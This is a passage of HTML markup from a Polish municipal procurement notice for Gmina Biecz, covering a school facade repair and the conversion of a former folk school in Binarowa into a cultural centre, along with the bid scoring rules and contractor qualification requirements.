class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych dla zadania inwestycyjnego pn. Modernizacja infrastruktury kulturalno - edukacyjnej na terenie Gminy Biecz.<br/>Część II - Remont elewacji Szkoły Podstawowej nr 1 im. Marcina Kromera w Bieczu. <br/>2. Zadanie realizowane w ramach Rządowego funduszu Polski Ład: Program Inwestycji Strategicznych nr Edycja8/2023/5745/PolskiLad na podstawie wstępnej promesy z dnia 25.07.2023 r.<br/>3. Zakres obejmuje:<br/>Realizacja robót budowlanych w etapie objętym niniejszym zamówieniem dotyczy remontu elewacji północnej (od stron ul. Grodzkiej) Szkoły Podstawowej nr 1 w Bieczu.<br/>Zakres prac obejmuje w szczególności:<br/>- wycinka 7 szt. Drzew zgodnie z zezwoleniem nr 7/2024 MWKZ na usunięcie drzew lub krzewów z terenu <br/> nieruchomości wpisanej do rejestru zabytków (kserokopia w załączeniu)<br/>- odkopanie i udrożnienie odpływu z rur spustowych<br/>- renowacja partii tynkowych i detali architektonicznych ściany i cokołu.<br/><br/>Zadanie należy zrealizować zgodnie z załączonym projektem architektoniczno – budowlanym oraz programem prac konserwatorskich zawierającym szczegółowy zakres oraz sposób przeprowadzenia prac oraz STWiOR. Dokumentacja została zatwierdzona pozwoleniem konserwatorskim nr 30/2024 z dnia 02.02.2024 r. znak DNS-II.5142.3.2024.AF oraz pozwoleniem na budowę nr 147/2024 z dnia 11.14.2024 znak AB.6740.87.2024 <br/>Wykonawca zobowiązany będzie do zapewnienia szczególnej organizacji pracy gdyż prace będące przedmiotem zamówienia realizowane będą podczas funkcjonowania szkoły oraz obok ruchliwej drogi publicznej. Wykonawca zobowiązany jest do odpowiedniego zabezpieczenia miejsc objętych robotami budowlanymi i pracami konserwatorskimi, celem umożliwienia funkcjonowania obiektu zgodnie z jego przeznaczeniem, w szczególności zabezpieczenia zdrowia i życia osób przebywających wokół wydzielonego terenu prowadzenia prac.<br/> Niezbędne jest uzyskanie przez Wykonawcę uzgodnienie prowadzenia prac w bezpośrednim sąsiedztwie drogi publicznej. Wykonawca na czas prowadzenia prac zapewni warunki bezpieczeństwa terenu objętego budową (w szczególności: wygrodzenia i zabezpieczenia), utrzymanie terenu budowy w stanie wolnym od przeszkód komunikacyjnych, składowanie w miejscach wyznaczonych wszelkich urządzeń pomocniczych, sprzętu i materiałów. Materiały pochodzące z rozbiórki winny być usuwane na bieżąco z terenu budowy. Termin wykonywania niebezpiecznych, głośnych i/lub uciążliwych prac będzie każdorazowo uzgadniany z Dyrektorem szkoły Jeżeli zaistnieje taka konieczność Zamawiający może zażądać wykonywania głośnych i/lub uciążliwych prac po godzinach funkcjonowania obiektu. <br/>Po zakończeniu robót budowalnych i konserwatorskich Wykonawca zobowiązany jest do przekazania Zamawiającemu powykonawczej dokumentacji prac konserwatorskich w 2 egz. papierowych oraz 1 egz. w wersji elektronicznej. <br/>Przedmiot zamówienia obejmuje ponadto:<br/>- Wykonanie w ramach ceny ofertowej wszelkich niezbędnych prac pomocniczych i towarzyszących oraz robót tymczasowych i innych, niezbędnych oraz pominiętych w wycenie i dokumentacji projektowej,<br/>- Roboty składające się na przedmiot zamówienia muszą być wykonane zgodnie z obowiązującymi przepisami (w szczególności ustawy prawo budowlane, ustawą o ochronie zabytków, ustawy prawo ochrony środowiska przepisami bhp i p.poż oraz branżowymi), jak również zgodnie z zasadami wiedzy technicznej, a także z należytą starannością, zachowaniem właściwej organizacji pracy i zapewnieniem dobrej jakości. <br/>- Materiały stosowane przez Wykonawcę podczas realizacji przedmiotu umowy powinny być fabrycznie nowe i odpowiadać, co do jakości, wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie, zgodnie z art. 10 ustawy z dnia 7 lipca 1994 roku Prawo budowlane oraz jakościowym i gatunkowym wymaganiom określonym w programie prac konserwatorskich.<br/>- Wszystkie użyte materiały, wyroby oraz urządzenia muszą mieć aktualne dokumenty (atesty, aprobaty<br/> i deklaracje zgodności) dopuszczające do stosowania w budownictwie, zgodnie z przepisami obowiązującymi w tym zakresie i muszą być zgodne z programem prac konserwatorskim. <br/>- Wykonawca robót ponosi odpowiedzialność za jakość wykonywanych robót oraz zastosowanych materiałów. Wszelkie zmiany w tym zakresie będą wymagały konsultacji z projektantem oraz Wojewódzkim Urzędem Ochrony Zabytków w Krakowie Delegatura w Nowym Sączu.<br/>- Na każde żądanie Inspektora Nadzoru, Wykonawca zobowiązany jest okazać, w stosunku do wskazanych materiałów (krajowe deklaracje zgodności), aprobatę techniczną oraz wymagane atesty (kartę charakterystyki), krajową ocenę techniczną wydaną przez upoważnioną instytucję krajową.<br/>- Materiały uznane przez Zamawiającego za posiadające wady lub niezgodne z programem prac konserwatorskich muszą być niezwłocznie usunięte przez Wykonawcę z terenu budowy. Wykonawca nie ma prawa wykonywać robót z użyciem materiałów, które nie zostały zaakceptowane przez Inspektora nadzoru.<br/>- Dodatkowo Wykonawca zobowiązany będzie do posiadania w okresie obowiązywania umowy ważnej polisy lub innego dokumentu ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż 50% wartości umownej. Kopię dokumentu przedstawi Wykonawca którego oferta zostanie wybrana przed podpisaniem umowy. Wykonawca zobowiązany jest do zapewnienia ciągłości ubezpieczenia w całym okresie realizacji prac. W przypadku zakończenia okresu obowiązywania polisy Wykonawca niezwłocznie przedstawi jej prolongatę.<br/>4. Szczegółowy opis przedmiotu zamówienia dla wszystkich części zawierają odpowiednio:<br/>a)	dokumentacja dla części I, II, III stanowiąca załącznik nr 1 do SWZ oraz dla części III Link: https://platformazakupowa.pl/transakcja/894478 (zał. nr 1 do SWZ),<br/>b)	istotne postanowienia umowy dla części I, II, III załącznik nr 7 do SWZ.<br/><br/>UWAGA! Przedmiary robót, które załączył Zamawiający mają znaczenie orientacyjne i pomocnicze. Wykonawca jest zobowiązany do dokonania własnych ustaleń co do rzeczywistego zakresu prac wymaganego do osiągnięcia rezultatu i dokonania ewentualnych uzupełnień lub zmian. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocena ofert zostanie przeprowadzona w oparciu o przedstawione poniżej kryteria oceny ofert tj:<br/>1) CENA (C) – waga 60 % sposób oceny: najniższa - łączna cena brutto za realizację całości zamówienia - maksymalna ilość<br/>punktów 60 pkt., pozostałe proporcjonalnie wg poniższego wyliczenia:<br/>C = Cena oferty najkorzystniejszej/ Cena oferty badanej x 100 x 60 %<br/>2) kryterium okres gwarancji (G) – waga 40 % sposób oceny: oferta spełniająca w najwyższym stopniu wymagania określone w<br/>kryterium „okres gwarancji” otrzyma maksymalną ilość 40 pkt., pozostałe proporcjonalnie, wg poniższego wyliczenia:<br/>Okres gwarancji = Okres gwarancji badanej oferty/ Najwyższy okres gwarancji spośród ofert x 100 x 40%<br/>Wykonawca zobowiązany jest podać w ofercie okres gwarancji jaki udzieli na wykonany przedmiot zamówienia w miesiącach, licząc<br/>od daty odbioru końcowego. Okres gwarancji należy podać w pełnych miesiącach.<br/>Najniższy dopuszczalny okres gwarancji podlegający ocenie: 36 miesięcy,<br/>Najwyższy okres gwarancji podlegający ocenie: 60 miesięcy.<br/><br/>2. Wybór najkorzystniejszej oferty:<br/>Oferta wypełniająca w najwyższym stopniu wymagania określone w powyższych kryteriach otrzyma maksymalną ilość punktów 100<br/>pkt. Pozostałym Wykonawcom, wypełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie<br/>mniejsza) ilość punktów.<br/>Punktacja ogólna zostanie obliczona wg następującego wzoru:<br/>PO = (C + G)<br/>gdzie:<br/>PO = punktacja ogólna,<br/>C = ilość punktów uzyskanych w kryterium – cena<br/>G = ilość punktów uzyskanych w kryterium – okres gwarancji<br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów<br/>spośród ofert nie podlegających odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych dla zadania inwestycyjnego pn. Modernizacja infrastruktury kulturalno - edukacyjnej na terenie Gminy Biecz. <br/>Część III - Przebudowa budynku Szkoły Ludowej w Binarowej na budynek kultury „Multimedialne Centrum Zwiedzania Świata, miejsca spotkań dla społeczności lokalnej oraz obsługi turystów”- Etap II<br/>2. Zadanie realizowane w ramach Rządowego funduszu Polski Ład: Program Inwestycji Strategicznych nr Edycja8/2023/5745/PolskiLad na podstawie wstępnej promesy z dnia 25.07.2023 r.<br/>3. Zakres obejmuje:<br/>Poniższy zakres robót jest II etapem robót obecnie realizowanych zgodnie z postępowaniem: 2024/BZP 00223127/01 „Wzmocnienie efektywności energetycznej zabytkowego budynku dawnej szkoły ludowej w Binarowej, będącego centrum aktywności lokalnej”.<br/><br/>Link: <br/>https://platformazakupowa.pl/transakcja/894478 <br/><br/>Po wyborze Wykonawcy II etapu objętego niniejszym postępowaniem zakresu robót budowlanych zostanie sporządzone Porozumienie dotyczące zasad współpracy Wykonawców przy realizacji robót.<br/><br/>Realizacja robót budowlanych w etapie objętym niniejszym zamówieniem dotyczy poniższego zakresu w szczególności:<br/>- rozebranie stropu, rozebranie ścian żelbetowych, rozebranie belek stropowych, rozebranie podług, rozebranie ślepego pułapu, rozebranie zasypki stropowej, rozebranie podsufitek, rozebranie posadzek, wywóz gruzu,<br/>- wykonanie stropu nad parterem części starszej budynku wraz z dociepleniem (płyty z wełny grubość 20 cm +15 cm);<br/>- zamurowania i uzupełnienia: izolacje przeciwwilgociowe, uzupełnienie ścianek lub zamurowani, wykonanie ścian z bloczków, wykonanie ścianek działowych, obsadzenie belek stalowych HEB z ich obmurowaniem (końce);<br/>- instalacje elektryczne (bez zakupu i montażu opraw);<br/>- posadzki (izolacja pozioma, warstwy wyrównawcze, posadzki cementowe)<br/>- ściany (odbicie tynków wewnętrznych, uzupełnienie tynków, przetarcie tynków wewnętrznych, zabudowa <br/> pod stelaże wc podtynkowe z płyt kg, tynki zwykłe kat III ścian i słupów,)<br/> - wykonanie wentylacji;<br/>- wykonanie klimatyzacji;<br/>- tablice rozdzielcze, montaż przewodów instalacji elektrycznej, pomiary instalacji elektrycznej;<br/>- instalacja oddymiania (bez okien dachowych oddymiających – 3 szt.)<br/>- budowa kanalizacji sanitarnej wewnętrznej; <br/>UWAGA ! NALEŻY WYKONAĆ DODATKOWO 4 PIONY INSTALACJI KANALIZACJI SANITARNEJ NA PIĘTRO NOWEJ CZĘŚCI BUDYNKU (POMIESZCZENIA BIUROWE 1.1 i 1.2);<br/>- instalacja oddymiania (bez okien dachowych oddymiających – 3 szt.)<br/>- instalacje telekomunikacyjne, elektryczne i elektryczne słaboprądowe wewnętrzne CCTV, LAN, SSWIN (piwnica, parter)<br/>- instalacja wykrywania i sygnalizacji pożaru SSP (piwnica, parter)<br/><br/>Zadanie należy zrealizować zgodnie z załączonym projektem architektoniczno – budowlanym, projektami wykonawczymi i technicznymi oraz programem prac konserwatorskich zawierającym szczegółowy zakres oraz sposób przeprowadzenia prac. Dokumentacja została zatwierdzona pozwoleniem na budowę nr 465/2023 z dnia 31.08.2023 r. znak AB.6740.513.2023. <br/>Wykonawca na czas prowadzenia prac zapewni warunki bezpieczeństwa terenu objętego budową (w szczególności: wygrodzenia i zabezpieczenia), utrzymanie terenu budowy w stanie wolnym od przeszkód komunikacyjnych, składowanie w miejscach wyznaczonych wszelkich urządzeń pomocniczych, sprzętu i materiałów. Materiały pochodzące z rozbiórki winny być usuwane na bieżąco z terenu budowy. <br/><br/>Przedmiot zamówienia obejmuje ponadto:<br/>- Wykonanie w ramach ceny ofertowej wszelkich niezbędnych prac pomocniczych i towarzyszących oraz robót tymczasowych i innych, niezbędnych oraz pominiętych w wycenie i dokumentacji projektowej,<br/>- Roboty składające się na przedmiot zamówienia muszą być wykonane zgodnie z obowiązującymi przepisami (w szczególności ustawy prawo budowlane, ustawą o ochronie zabytków, ustawy prawo ochrony środowiska przepisami bhp i p.poż oraz branżowymi), jak również zgodnie z zasadami wiedzy technicznej, a także z należytą starannością, zachowaniem właściwej organizacji pracy i zapewnieniem dobrej jakości. <br/>- Materiały stosowane przez Wykonawcę podczas realizacji przedmiotu umowy powinny być fabrycznie nowe i odpowiadać, co do jakości, wymogom wyrobów dopuszczonych do obrotu i stosowania w budownictwie, zgodnie z art. 10 ustawy z dnia 7 lipca 1994 roku Prawo budowlane oraz jakościowym i gatunkowym wymaganiom określonym w programie prac konserwatorskich.<br/>- Wszystkie użyte materiały, wyroby oraz urządzenia muszą mieć aktualne dokumenty (atesty, aprobaty<br/> i deklaracje zgodności) dopuszczające do stosowania w budownictwie, zgodnie z przepisami obowiązującymi w tym zakresie i muszą być zgodne z programem prac konserwatorskim. <br/>- Na każde żądanie Inspektora Nadzoru, Wykonawca zobowiązany jest okazać, w stosunku do wskazanych materiałów (krajowe deklaracje zgodności), aprobatę techniczną oraz wymagane atesty (kartę charakterystyki), krajową ocenę techniczną wydaną przez upoważnioną instytucję krajową.<br/>- Materiały uznane przez Zamawiającego za posiadające wady lub niezgodne z programem prac konserwatorskich muszą być niezwłocznie usunięte przez Wykonawcę z terenu budowy. Wykonawca nie ma prawa wykonywać robót z użyciem materiałów, które nie zostały zaakceptowane przez Inspektora nadzoru.<br/>- Dodatkowo Wykonawca zobowiązany będzie do posiadania w okresie obowiązywania umowy ważnej polisy lub innego dokumentu ubezpieczenia potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczenia nie mniejszą niż 50% wartości umownej. Kopię dokumentu przedstawi Wykonawca którego oferta zostanie wybrana przed podpisaniem umowy. Wykonawca zobowiązany jest do zapewnienia ciągłości ubezpieczenia w całym okresie realizacji prac. W przypadku zakończenia okresu obowiązywania polisy Wykonawca niezwłocznie przedstawi jej prolongatę.<br/><br/>4. Szczegółowy opis przedmiotu zamówienia dla wszystkich części zawierają odpowiednio:<br/>a)	dokumentacja dla części I, II, III stanowiąca załącznik nr 1 do SWZ oraz dla części III Link: https://platformazakupowa.pl/transakcja/894478 (zał. nr 1 do SWZ),<br/>b)	istotne postanowienia umowy dla części I, II, III załącznik nr 7 do SWZ.<br/><br/>UWAGA! Przedmiary robót, które załączył Zamawiający mają znaczenie orientacyjne i pomocnicze. Wykonawca jest zobowiązany do dokonania własnych ustaleń co do rzeczywistego zakresu prac wymaganego do osiągnięcia rezultatu i dokonania ewentualnych uzupełnień lub zmian. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45314000-1 - Instalowanie urządzeń telekomunikacyjnych</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Ocena ofert zostanie przeprowadzona w oparciu o przedstawione poniżej kryteria oceny ofert tj:<br/>1) CENA (C) – waga 60 % sposób oceny: najniższa - łączna cena brutto za realizację całości zamówienia - maksymalna ilość<br/>punktów 60 pkt., pozostałe proporcjonalnie wg poniższego wyliczenia:<br/>C = Cena oferty najkorzystniejszej/ Cena oferty badanej x 100 x 60 %<br/>2) kryterium okres gwarancji (G) – waga 40 % sposób oceny: oferta spełniająca w najwyższym stopniu wymagania określone w<br/>kryterium „okres gwarancji” otrzyma maksymalną ilość 40 pkt., pozostałe proporcjonalnie, wg poniższego wyliczenia:<br/>Okres gwarancji = Okres gwarancji badanej oferty/ Najwyższy okres gwarancji spośród ofert x 100 x 40%<br/>Wykonawca zobowiązany jest podać w ofercie okres gwarancji jaki udzieli na wykonany przedmiot zamówienia w miesiącach, licząc<br/>od daty odbioru końcowego. Okres gwarancji należy podać w pełnych miesiącach.<br/>Najniższy dopuszczalny okres gwarancji podlegający ocenie: 36 miesięcy,<br/>Najwyższy okres gwarancji podlegający ocenie: 60 miesięcy.<br/><br/>2. Wybór najkorzystniejszej oferty:<br/>Oferta wypełniająca w najwyższym stopniu wymagania określone w powyższych kryteriach otrzyma maksymalną ilość punktów 100<br/>pkt. Pozostałym Wykonawcom, wypełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie<br/>mniejsza) ilość punktów.<br/>Punktacja ogólna zostanie obliczona wg następującego wzoru:<br/>PO = (C + G)<br/>gdzie:<br/>PO = punktacja ogólna,<br/>C = ilość punktów uzyskanych w kryterium – cena<br/>G = ilość punktów uzyskanych w kryterium – okres gwarancji<br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów<br/>spośród ofert nie podlegających odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu na podstawie:<br/>- art. 108 ust. 1 ustawy Pzp,<br/>- art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, (Dz. U. 2022 poz. 835), zwana dalej „UOBN”.<br/>2) spełniają warunki udziału w postępowaniu, dotyczące:<br/> a) zdolności do występowania w obrocie gospodarczym; <br/>Zamawiający nie stawia warunku w tym zakresie.<br/><br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów;<br/>Zamawiający nie stawia warunku w tym zakresie.<br/><br/>c) sytuacji ekonomicznej lub finansowej;<br/> Zamawiający nie stawia warunku w tym zakresie.<br/><br/>d) zdolności technicznej lub zawodowej;<br/>Część I<br/>- warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje, lub będzie dysponował jedną osobą pełniącą funkcje Kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej bez ograniczeń, która spełnia wymagania dla osób zatrudnionych przy zabytkach wpisanych do rejestru określone w art. 37 c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t. j.: Dz. U z 2022 r., poz. 840)<br/>Część II<br/>- warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje, lub będzie dysponował jedną osobą pełniącą funkcje Kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej bez ograniczeń, która spełnia wymagania dla osób zatrudnionych przy zabytkach wpisanych do rejestru określone w art. 37 c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (t. j.: Dz. U z 2022 r., poz. 840)<br/>Część III<br/>− warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty oraz zgodnie z zasadami sztuki budowlanej wykonał i prawidłowo ukończył co najmniej 2 roboty budowlane polegające na budowie, przebudowie, remoncie lub modernizacji obiektu budowlanego o wartości nie mniejszej niż 400 000,00 zł brutto każda z nich;<br/>− warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje, lub będzie dysponował przynajmniej jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów;<br/>− warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje, lub będzie dysponował przynajmniej jedną osobą pełniącą funkcje Kierownika robót posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz elektroenergetycznych bez ograniczeń lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów;<br/>− warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje, lub będzie dysponował przynajmniej jedną osobą pełniącą funkcje Kierownika robót posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej lub innych obowiązujących przepisów.<br/>Dla wszystkich części:<br/>UWAGA! Przez uprawnienia należy rozumieć: uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2020r., poz. 1333 ze zm.) oraz w Rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 6 maja 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r., poz. 831) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, a które uprawniają do pełnienia tych funkcji w odpowiednim zakresie.<br/>W przypadku wykonawców zagranicznych, dopuszcza si ę równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r., poz. 220).<br/><br/>Zamawiający dopuszcza łączenie w/w specjalności jeśli którakolwiek z uprawnionych osób będzie posiadała łącznie wymagane przez Zamawiającego uprawnienia.<br/><br/>Zamawiający dokona oceny spełnienia ww. warunku metodą „spełnia/nie spełnia” na podstawie dokumentów złożonych przez Wykonawcę. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty wykonawca winien dołączyć oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu – załącznik do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni terminie aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1)	potwierdzających spełnianie warunków udziału w postępowaniu:<br/>a)	wykazu osób ( dla części 1-3) , skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, zgodnie ze wzorem stanowiącym załącznik do SWZ.<br/>b)	wykazu robót budowlanych (dla części 3) wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty, zgodnie ze wzorem stanowiącym załącznik do SWZ,</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. konsorcjum, spółka cywilna), wskazane wyżej warunki udziału w postępowaniu mogą spełniać łącznie. Warunek zostanie również uznany za spełniony, jeżeli jeden z wykonawców spełni warunek samodzielnie.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy załączyć odpowiednie pełnomocnictwo), chyba że w przypadku spółki cywilnej, z umowy tej spółki wynika sposób jej reprezentowania (do stwierdzenia czego niezbędne będzie załączenie do oferty umowy spółki cywilnej).<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o 